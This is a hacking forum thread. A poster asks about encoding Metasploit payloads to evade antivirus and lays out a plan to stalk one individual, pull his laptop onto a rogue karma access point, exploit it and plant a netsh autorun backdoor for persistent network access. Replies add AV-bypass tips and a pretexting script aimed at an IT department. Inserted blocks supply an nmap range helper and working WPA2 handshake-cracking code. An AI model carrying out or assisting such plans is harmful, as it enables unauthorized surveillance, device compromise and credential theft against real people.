Forum Thread: Msfconsole Payloads Encoding and Uncommon Wifi Hacking Methods

Hi Everyone!

This is my first post here, but I've been reading Null-Byte for a long time, learning and getting better and better. Thanks especially to OTW, CIUFFY and Hacker|Cracker, I love your posts! Today I finished reading articles and manuscripts about evading AV. That knowledge brought me some questions, so I decided to sign up and join this great community.

  1. Can I change/add a custom template to a PAYLOAD (for example reverse_tcp for Windows) and then use it in msfconsole with a built-in exploit, or one I created myself?
  2. Can I encode all PAYLOADS at once (using, for example, 40 iterations of x86 shikata_ga_nai) and save them for later use with msfconsole? I was reading OTW's great posts and searching on the Internet, but the most common example is making an encoded exe file. I know that I can hijack and "patch" some updates to deliver my code, but I wanted to deliver it with some exploits from the msf trunk. For example the 067netapi exploit.

Now I want to ask about some advanced WiFi hacking methods and a problem with subnets.

I know that this might be a really stupid question; my English is not very good and sometimes I do not know how to ask Google. If this subject has already been discussed, please just give me the right query and I will find it myself, I am not lazy! :) So:

Let's assume that we are in StarCaffe or McBurger, with a login required to "sell" our email/privacy. That's OK, I can bypass it with ICMP tunneling or DNS. But I want to discover hosts. The problem is that clients join other subnets and not all of them are in my subnet (for example, I am the only one). Is it possible to implement such a solution? And is it possible to scan it with nmap? For example, what command am I supposed to use to scan the range from 192.168.0.1 to 192.168.16.254? A simple hyphen doesn't work for me. Of course, if this is not possible without a login, I can simply use 10 minute mail.

This is the part I am most excited about. Not everyone knows that Windows 7 and above can create a software AP with built-in commands (netsh). You can do it simply by compromising the system and using simple commands, but I was thinking about something different. Let's assume a situation where I have to compromise a bad guy's files. Let's assume:

  • he uses WPA/WPA2-encrypted WiFi at "work"
  • he has a Windows 7 laptop with an encrypted container
  • I did my homework, a little espionage, and I know where he lives, where he works, where he eats.

Now, I can:

  1. Steal his notebook and try to crack the encryption. Bad idea; I could use biosmemige just after shutdown to recover the encryption passphrase and then try to get the files, but this could compromise my operation.
  2. The second option is much better. Let's say I can park my car nearby, bump him off his network, use karma on my Kali Linux machine to auto-create the ESSID he tries to connect to, and his system auto-connects to my network. Now I can start exploitation, but there is the possibility of connection loss and stuff like that. So I have 5 minutes to do something. I can compromise his browser with autopwn2 and somehow inject a reverse_tcp payload, or create a gateway for future exploitation:
  • run netsh on his box, adding a script to autorun

Now I have an Internet connection to his network even after reboot. He is our gateway. We can compromise his computer and use it to compromise the whole network. Has anybody tried that? So far I am making some configurations on my Win 7 and 8.1 boxes and tomorrow I will apply this attack. If you have any advice, please share it, because as you know, I am new to hacking, but I am learning quickly. If you have never thought about that exploitation, just let me know if you are interested. I will try to write a post after success :)

Thanks for any reply. If I've screwed something up, I am really sorry.

4 Responses

I'm not sure what your question about the encoding is exactly about.

However, I'm assuming you're referring to generating payloads and then using them later? Of course, however it may be better to just generate them on the fly or create a script to do so. If you're looking for better ways to evade anti-virus you should check out Veil Evasion or write your own payloads. There are many good tutorials here https://null-byte.wonderhowto.com/how-to/evading-av-software/ for this.

The subnet question is a tricky one, simply because I am unsure of the network you're interacting with. Some APs use a technology called client isolation which will essentially separate you from the rest of the network; to my knowledge there is no way to evade this, however more experienced ones will surely know the answer to this.

As for the exploitation scenario you've explained, the sky is the limit; however, I have found personally that browser autopwn/2 doesn't have amazing success rates. You'd be better off doing enough recon to become aware of the anti-virus they use, perhaps by social engineering the IT dept (call on the pretext of selling a brand new anti-virus product; people are very open to salespeople, and people love to contradict people, perhaps even put a call center audio loop in the background), and then generating a payload that is capable of bypassing that AV using a test lab and msfvenom.

Hope I'm of some help :)
pry0cc

Such an honor to be useful around here.

1) You can if you mess around a little bit with Ruby and Metasploit Unleashed.
2) The script solution provided by pry0cc sounds best. The payload is hardcoded with your IP, which might change.

For the scanning question, you want to look for Class B network scanning.

As for the connection error problem, you can inject an autorun payload addressing the port and public IP address of your listener machine. That sounds like too complicated and temporary a setup. He could just shut the computer down.
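The range syntax that tripped the poster up, as an added example (not from the thread, and not nmap's own code): nmap does not take a bare `start-end` pair, but it does take a hyphen range inside each octet and any number of CIDR blocks on one command line. The code below builds both forms for 192.168.0.1 to 192.168.16.254 and expands them, so you can see exactly which addresses each would sweep; only the two addresses come from the question, the helper names are the example's own.

```python
"""Target specs nmap accepts for 192.168.0.1-192.168.16.254.

Added example for the scanning question in the thread; not code from the
thread or from nmap. Only the two addresses come from the question; the
helper names are this example's own.
"""
import ipaddress
import itertools
from typing import List, Set


def octet_range_spec(start: str, end: str) -> str:
    """Per-octet form, e.g. 192.168.0-16.1-254.

    nmap treats each octet range independently (a Cartesian product), which is
    what a host sweep usually wants: .1-.254 in every /24 from .0 through .16.
    """
    s, e = start.split("."), end.split(".")
    return ".".join(a if a == b else f"{a}-{b}" for a, b in zip(s, e))


def expand_spec(spec: str) -> Set[ipaddress.IPv4Address]:
    """Expand nmap's per-octet syntax: hyphen ranges and comma lists in each octet."""
    octets = []
    for part in spec.split("."):
        values = []
        for item in part.split(","):
            lo, _, hi = item.partition("-")
            values.extend(range(int(lo), int(hi or lo) + 1))
        octets.append(values)
    return {ipaddress.IPv4Address(".".join(map(str, o))) for o in itertools.product(*octets)}


def linear_range(start: str, end: str) -> Set[ipaddress.IPv4Address]:
    """Every address from start to end inclusive (what a bare start-end would mean)."""
    a, b = int(ipaddress.IPv4Address(start)), int(ipaddress.IPv4Address(end))
    return {ipaddress.IPv4Address(i) for i in range(a, b + 1)}


def cidr_blocks(start: str, end: str) -> List[str]:
    """Exact cover of start..end as CIDR blocks; nmap takes all of them at once."""
    a, b = ipaddress.IPv4Address(start), ipaddress.IPv4Address(end)
    return [str(n) for n in ipaddress.summarize_address_range(a, b)]


def enclosing_cidr(start: str, end: str) -> str:
    """Smallest single block containing both ends; over-scans when the range is not aligned."""
    net = ipaddress.IPv4Network(f"{start}/32")
    while ipaddress.IPv4Address(end) not in net:
        net = net.supernet()
    return str(net)


def in_network(addr: str, cidr: str) -> bool:
    return ipaddress.IPv4Address(addr) in ipaddress.IPv4Network(cidr)


def nmap_command(targets: List[str]) -> str:
    return "nmap -sn " + " ".join(targets)  # -sn: host discovery only, no port scan


if __name__ == "__main__":
    start, end = "192.168.0.1", "192.168.16.254"
    spec = octet_range_spec(start, end)
    skipped = linear_range(start, end) - expand_spec(spec)
    print(nmap_command([spec]), f"# {len(expand_spec(spec))} hosts, skips {len(skipped)} .0/.255 addresses")
    print(nmap_command(cidr_blocks(start, end)), "# exact cover")
    print(nmap_command([enclosing_cidr(start, end)]), "# one block, over-scans")
    print("192.168.16.5 in 192.168.0.0/20:", in_network("192.168.16.5", "192.168.0.0/20"))
```

Two things the expansion makes visible: the per-octet form is a product, so it leaves out the 32 network and broadcast addresses of the intermediate /24s, which is usually what you want for a host sweep; and the obvious single block, 192.168.0.0/20, stops at 192.168.15.255 and misses the whole 192.168.16.x range, which is why the exact CIDR list or the /19 is needed. The "Class B" hint above amounts to `nmap -sn 192.168.0.0/16`, the same idea at the cost of 65 thousand addresses. None of this gets around client isolation, which is enforced by the AP before any probe reaches another client.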

Many details. This is the kind of question that deserves an answer.

To hack that WiFi... you can either use the aircrack suite...
Or you can use reaver or bully if it has WPS..
The fastest and easiest bet would be social engineering!! ;);)

Thank you all!
CIUFFY:

Of course I have already read a lot and used Veil. The point is that meterpreter is the most recognizable malicious code ever made :). People from AV labs ain't stupid, they probably started with malware, so I believe that all of the common AVs recognize it. So I wanted to change it in a way that will not trigger any alerts. I do not want to create a new exe file, because that is easy and I know how to do it :) I will study harder and try your solutions.

pry0cc:
As I mentioned, I know Veil, Cobalt Strike etc. Thanks.
About subnets:
Probably it is client isolation. I will set up a MikroTikOS router and try to handle it; maybe I have met this kind of option.

SE7ENPEACE:

Yeah, I know, but: to crack WPS you need a special AP setup. I have no patience to use aircrack-ng. Usually, I just collect the handshake with airodump and then use oclHashcat. It is the fastest way, but... you have to have this password in the wordlist. I can pipe JTR, modify it, but there are no collisions in the encryption used in WPA/WPA2.

My scenario can be deployed with the USB driveby hack. The point is to get access to that network, which is highly secure (RADIUS with encryption). When you create such a soft AP, then you can access this network. Today I've managed to exploit the gateway (Windows 7), so I will post soon with a solution for how to do that. I'm using an Alfa NIC and a Yagi antenna, so range is not a problem, so I think that this method can be useful during a full security audit and penetration test of a company.

Thanks again, and sorry for my English :)
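The "handshake plus wordlist" approach from the last reply, as an added example (not from the thread, airodump-ng or hashcat): a cracker inverts nothing; for each candidate passphrase it recomputes PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds), derives the KCK from it with the handshake's MACs and nonces, recomputes the MIC over the captured EAPOL-Key message 2, and compares. The handshake below is constructed in code with made-up MACs, nonces, SSID and passphrase so that it runs offline; the field offsets are those of an RSN EAPOL-Key frame, and the "password"/"IEEE" vector in the test is the one from the 802.11i standard's annex.

```python
"""WPA2-PSK handshake check: the per-candidate work a wordlist cracker does.

Added example for the handshake-plus-wordlist discussion; not code from the
thread, airodump-ng or hashcat. The handshake it checks is constructed here
(made-up MACs, nonces, SSID and passphrase), not a real capture.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional

# MIC field offset in an EAPOL-Key frame:
# 802.1X hdr(4) + desc type(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81


@dataclass
class Handshake:
    ssid: str
    aa: bytes      # authenticator (AP) MAC
    spa: bytes     # supplicant (station) MAC
    anonce: bytes
    snonce: bytes
    eapol: bytes   # EAPOL-Key message 2 as captured, MIC included


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes); the slow step
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PRF-512 "Pairwise key expansion"; the KCK is the first 16 bytes of the PTK,
    # i.e. of the first HMAC block (counter byte 0), so that is all the MIC needs.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return hmac.new(pmk, b"Pairwise key expansion\x00" + data + b"\x00", hashlib.sha1).digest()[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    version = int.from_bytes(eapol[5:7], "big") & 0x7   # key descriptor version from Key Information
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    if version == 1:                                     # TKIP: HMAC-MD5
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]  # CCMP: HMAC-SHA1-128


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose recomputed MIC matches the captured one, else None."""
    captured = hs.eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = kck_from_pmk(pmk_from_passphrase(candidate, hs.ssid), hs.aa, hs.spa, hs.anonce, hs.snonce)
        if hmac.compare_digest(eapol_mic(kck, hs.eapol), captured):
            return candidate
    return None


def build_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key message 2 (RSN, key info 0x010a = version 2 | pairwise | MIC set)."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x00" + (1).to_bytes(8, "big") + snonce
            + bytes(16) + bytes(8) + bytes(8) + mic + b"\x00\x00")
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def make_demo_handshake(passphrase: str, ssid: str = "CorpWiFi") -> Handshake:
    """Constructed 'capture': what the station would have sent had it used this passphrase."""
    aa, spa = bytes.fromhex("0011aa55aabb"), bytes.fromhex("0011cc99ccdd")   # made-up MACs
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))                 # made-up nonces
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
    mic = eapol_mic(kck, build_msg2(snonce))
    return Handshake(ssid, aa, spa, anonce, snonce, build_msg2(snonce, mic))


if __name__ == "__main__":
    hs = make_demo_handshake("correct horse battery")
    print(crack(hs, ["password", "12345678", "correct horse battery", "letmein"]))
```

This is exactly the check hashcat's WPA modes run on the GPU. Every candidate costs 4096 PBKDF2 rounds, which is why throughput and wordlist quality decide the outcome: a passphrase that neither the list nor a rule produces is never found, and there is no shortcut through the MIC, which is the "no collisions" point from the reply above.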
